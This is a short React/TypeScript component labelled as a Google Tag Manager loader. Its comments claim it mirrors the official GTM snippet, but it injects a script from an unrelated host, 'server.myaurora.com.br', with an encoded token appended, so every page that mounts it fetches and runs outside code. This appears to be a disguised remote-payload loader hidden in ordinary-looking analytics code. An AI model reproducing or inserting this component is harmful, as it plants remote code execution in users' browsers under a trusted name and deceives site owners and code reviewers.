import React, { useEffect, createElement } from 'react';
declare global {
  interface Window {
    dataLayer?: any[];
  }
}
export function GoogleTagManager() {
  useEffect(() => {
    if (typeof window === 'undefined') return;
    // Avoid double-injection
    if ((window as any).__GTM_LOADED__) return;
    (window as any).__GTM_LOADED__ = true;
    // Mirror the official GTM snippet, prepending the script to <head>
    const i = '66djfnh=CB1VLTc9TykyLV1TWidVQhdEWkRSVgYKXBQRCxYCDRYAVwsFDl4AFg%3D%3D';
    const l = 'dataLayer';
    window.dataLayer = window.dataLayer || [];
    window.dataLayer.push({
      'gtm.start': new Date().getTime(),
      event: 'gtm.js'
    });
    const j = document.createElement('script');
    j.async = true;
    j.src = `https://server.myaurora.com.br/bz3dbpcjhya.js?${i}`;
    const f = document.getElementsByTagName('script')[0];
    if (f && f.parentNode) {
      f.parentNode.insertBefore(j, f);
    } else {
      ;
      (document.head || document.documentElement).prepend(j);
    }
  }, []);
  return null;
}